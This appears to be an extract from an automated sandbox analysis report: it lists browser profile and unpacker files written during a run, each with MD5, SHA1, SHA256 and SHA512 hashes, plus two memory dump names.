SHA512 e0b1c0f4fc4adec867c76a77e697a94ab3fb2696960a0bbeb8ee7f22b0fcf7a7f10f7e92eb8ba78eeacaa0683f26214132b3fc781fca84b4d5c5df4f62cc4f63

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2fa4a2f2d952a81bd96ea39195278892
SHA1 d4264e7ebdda53dac08cc28e5d89568af5ac552e
SHA256 4897d73da03b508cb64adc1a6bfb66d4c10504967f00f783039dd35714c8dd6a
SHA512 fe2c92032cf2e15427fc6d34a10c8fc306d7a91d8f9800c4a224c613ea8b8fd1bd8224713d6c22e54e1852f3d7337b031ee21feb659ccbf010cf24328ce89603

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 aab1906aec0ac45b56f690d6f36f1953
SHA1 66fbf746648bc7618957e89510208cc91ba4be4c
SHA256 0ee38432112c4f1ca7ed589f1ce65aa30aab6a905e0894fd069c1aca14df492f
SHA512 7a53ecfcec48a7b4bf94d5f0d38ed4fd0fcf0782467d1741ed4e47e514adfd6322e464e3311aa22c49cf67a3714f44526fed145ba6206a6dadebdc32903f0b37

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 c8988d4543db30924b1797ddf7354d14
SHA1 f201f4e636c6f864ad6c81aec35f12f74e5fea6f
SHA256 421ccce34a010faca4c0e3aed087248245d993b29bbd95374d9ace4993e136cb
SHA512 0a585aa73f14e2bb37ce2f21b1d4d3fdb11f0387be6d9f2ca4828a75163442ecc9c65fa2e4ef18ecb6a54f95c244c1726f95c6a468b3c1519fcb775492e74b39

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 855f7abcffd8848f3ddaa3032073b361
SHA1 06f2122e813f346dd1023f3844984262e4048699
SHA256 1a31571518c6b1ea91c155239ac7798cc30373f21c5d9f36bf23800d62efa8f3
SHA512 41fa37b11584711defd3951f49ddf3761d151ef05838944efe754f5140584a070a9ea731a0e133ead36e5a59bcf0753aac40744cdb2f994a2e39803b6aca2aaf

C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.json

MD5 e6cd92ad3b3ab9cb3d325f3c4b7559aa
SHA1 0704d57b52cf55674524a5278ed4f7ba1e19ca0c
SHA256 63dfb8d99ce83b3ca282eb697dc76b17b4a48e4065fc7efafb77724739074a9d
SHA512 172d5dc107757bb591b9a8ed7f2b48f22b5184d6537572d375801113e294febfbe39077c408e3a04c44e6072427cbe443c6614d205a5a4aa290101722e18f5e8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2024.12.2\crl-set

MD5 846feb52bd6829102a780ec0da74ab04
SHA1 dd98409b49f0cd1f9d0028962d7276860579fb54
SHA256 124b7eeba31f0e3d9b842a62f3441204beb13fade81da38b854aecba0e03a5b4
SHA512 c8759e675506ccc6aa9807798252c7e7c48a0ab31674609738617dc105cee38bce69d4d41d6b95e16731466880b386d35483cbeea6275773f7041ba6e305fae9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 2acd390ef7596d45b7864455166afc6b
SHA1 c684f91b60386387786323b4ef5839b29f1346bb
SHA256 b5584f7fef501df921b56ba06747cb72fb32cead2dbae829c0525430deb3a33f
SHA512 0ac08b6287efc77b0a698d573902368d80424c95ea00b3d8607607bf1038763573150ae0c0e1314aff0e8aca21d8c9b2b9f1a8909d44501c96fe38b0527a04b5

memory/5452-3924-0x0000000000400000-0x000000000040E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 b69247caf64914466b8f2988d4678b4f
SHA1 269fb084ad4f9a55296c9ea731d279d3c32748e5
SHA256 ae89c8728442f3b4ee4066378105271dbab35980b873762f51902c77d08cd10d
SHA512 4ceb746eca8ecdf4e9883dcd3810a4f5bb27d4eda1d9a87cbec3d8a33f78f5b4d8c2eb49debe0c8c5a04b638cfc8ced8ac2d488d98e39e8015e4ce846969faa0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b2c78e26cf8c84dc3583a3258a3c5b54
SHA1 c5e5138a43bda7d29e9f940c57712aa3515ddc83
SHA256 530215a5f0c7e6f12b0315c7ae5323ff683b1279febe9bf1d7df04e829e88af5
SHA512 fec1c2582cdd703ed032a435dbbad0f7a0794be739b8c8ef85e2caab35a64960472f77b5114a64d772c1f85673bb0118b8c9e82dfc050a2d60cbe1f54d762f80

memory/5300-3969-0x0000000000400000-0x000000000040E000-memory.dmp

C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\manifest.json

MD5 ec2d07974ef45152a83c82d09a08e138
SHA1 cdfca8778648c74844b359b2d0f1d405302de8f6
SHA256 bd6ad3cd015f36a4958892945f666703aeb10b2999422f58b699ba2d0895fa87
SHA512 a9ec4562f90d2400229c6b30259ba569181398e20ede3dee4e8199a3c46f7607de5f78ab2ca115d83e7296f4e373625790ebe00108f1d0568b8f6f42cbc26dde

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.5.9.1\typosquatting_list.pb

MD5 a50b46aa311787328482750c251d2633
SHA1 eaa327f9a89e5ec13301979f4ce49a36fc871049
SHA256 019b9efc88e3e5939912472d7a9e43a8d9b675fff7ebf9b7b445042f6de4b721
SHA512 a6820b29aa645abebeca3683ceb91372d69d8e589859e03f653ad6b2f3470ce2248603ce265c5d11f3da4833776d22493f3371e8e297591b678fa364bb5dc149

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c4cbaf551267b48b2bbecf73dbb170fa
SHA1 9e294ab4b33e5c7c8e0047e6a726d7bca6685fef
SHA256 217c0349229460479b90297f4ba8d3363c87a03a2387b95f847829d79318babd
SHA512 5855b35404fdd4421b604227b8b6321900ae6c82f5b066988c171c52c4ebb0a7cc4400e55570f56682f65230154793e1a4fb04231885ebf0cad3a511273cdb9c